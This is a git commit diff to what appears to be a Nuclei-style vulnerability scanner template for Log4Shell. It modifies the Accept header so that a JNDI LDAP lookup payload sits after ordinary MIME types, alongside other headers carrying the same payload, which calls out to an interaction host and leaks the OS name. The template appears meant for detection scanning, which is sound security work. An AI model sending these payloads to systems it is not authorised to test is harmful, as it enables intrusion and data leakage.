update Accept

patch-1
j4vaovo 2023-04-20 23:54:41 +08:00 committed by GitHub
parent 8051b30eee
commit 50f218f2e6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -28,7 +28,7 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: ${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${sys:os.name}.accept.{{interactsh-url}}}
Accept-Encoding: ${jndi:ldap://${sys:os.name}.acceptencoding.{{interactsh-url}}}
Accept-Language: ${jndi:ldap://${sys:os.name}.acceptlanguage.{{interactsh-url}}}
Access-Control-Request-Headers: ${jndi:ldap://${sys:os.name}.accesscontrolrequestheaders.{{interactsh-url}}}